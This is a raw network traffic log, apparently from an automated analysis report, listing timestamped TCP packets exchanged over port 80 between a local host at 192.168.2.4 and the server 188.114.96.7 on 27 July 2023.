Jul 27, 2023 20:19:23.684778929 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.684828043 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685064077 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685091019 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685117006 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685132027 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685157061 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685184002 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685184002 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685230017 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685271025 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685300112 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685326099 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685344934 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685420036 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685445070 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685466051 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685468912 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685492992 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685504913 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685518026 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685544968 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685569048 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685580969 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685595036 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685620070 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685621977 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685648918 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685672998 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685697079 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685698986 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685722113 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685745001 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685746908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685769081 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685771942 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685797930 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685822964 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685846090 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685864925 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685884953 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685908079 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.685909986 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685935020 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.685956955 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686052084 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.686052084 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.686151981 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686192989 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686218977 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686242104 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686252117 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.686268091 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686291933 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686300993 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.686316967 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686340094 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686345100 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.686364889 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686384916 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.686388969 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686414957 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686439037 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686449051 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.686464071 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686482906 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.686486959 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686511040 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686517954 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.686536074 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686659098 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.686772108 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686798096 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686820984 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686844110 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.686853886 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.686886072 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.687062025 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687088966 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687114000 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687124968 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.687139988 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687164068 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687187910 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687194109 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.687213898 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687222004 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.687238932 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687263966 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687287092 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687305927 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.687310934 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687331915 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.687335014 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687360048 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687367916 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.687383890 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687427044 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687449932 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687469006 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.687474012 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687495947 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.687498093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687521935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687530994 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.687546015 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687570095 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687592983 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.687593937 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.687630892 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.687988043 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688013077 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688038111 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688050032 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.688064098 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688088894 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688112974 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688127041 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.688139915 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688159943 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.688164949 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688190937 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688198090 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.688215971 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688241005 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688271999 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.688275099 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688303947 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688313007 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.688328981 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688354015 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688376904 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688388109 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.688421965 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688430071 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.688446999 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688472033 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688496113 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688505888 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.688520908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688539028 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.688544989 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688577890 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.688916922 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688944101 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688967943 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.688992023 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689012051 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689017057 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689040899 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689064980 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689068079 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689089060 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689102888 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689114094 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689138889 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689141035 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689165115 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689174891 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689189911 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689213991 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689228058 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689239979 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689265013 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689289093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689299107 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689313889 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689333916 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689338923 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689363956 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689373016 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689388037 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689412117 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689435005 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689445972 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689482927 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689829111 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689855099 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689877987 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689902067 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689919949 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689925909 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689949036 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689950943 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689974070 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.689992905 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.689997911 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690021992 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690045118 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690047979 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.690068960 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690089941 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.690093994 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690120935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690129042 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.690145969 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690171003 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690195084 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690205097 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.690220118 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690238953 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.690243959 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690268040 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690289021 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.690291882 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690315962 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690326929 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.690340042 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690769911 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690797091 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690815926 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.690821886 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690840960 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.690845966 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690870047 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690891027 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.690893888 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690918922 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690929890 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.690944910 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690968990 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.690994024 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691013098 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691019058 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691039085 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691042900 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691066980 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691087008 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691092014 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691117048 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691126108 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691143036 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691165924 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691189051 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691206932 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691212893 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691231966 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691236973 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691240072 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691262007 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691278934 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691284895 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691329002 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691410065 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691521883 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691786051 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691811085 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691833973 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691853046 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691858053 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691890001 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691903114 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691915989 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691942930 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691951036 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.691970110 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.691993952 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692018986 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692028999 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692044020 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692063093 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692069054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692094088 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692116022 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692120075 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692146063 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692169905 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692181110 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692194939 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692213058 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692219019 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692275047 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692275047 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692301035 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692325115 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692349911 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692361116 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692397118 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692620039 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692658901 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692683935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692708015 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692719936 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692734003 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692755938 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692756891 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692781925 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692801952 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692827940 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692852020 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692877054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692898035 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692902088 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692925930 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692929983 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692950010 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.692970991 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.692974091 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693002939 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693022013 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.693027973 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693053961 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693063021 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.693078995 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693103075 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693128109 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.693128109 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693154097 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693171978 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.693176031 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693214893 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.693650007 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693675995 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693700075 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693718910 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.693723917 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693749905 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693774939 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693784952 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.693819046 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.693864107 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693888903 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693912029 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693937063 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693955898 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.693960905 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.693984032 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.693985939 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694010973 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694031000 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.694036007 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694058895 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694071054 CEST	49770	80	192.168.2.4	188.114.96.7
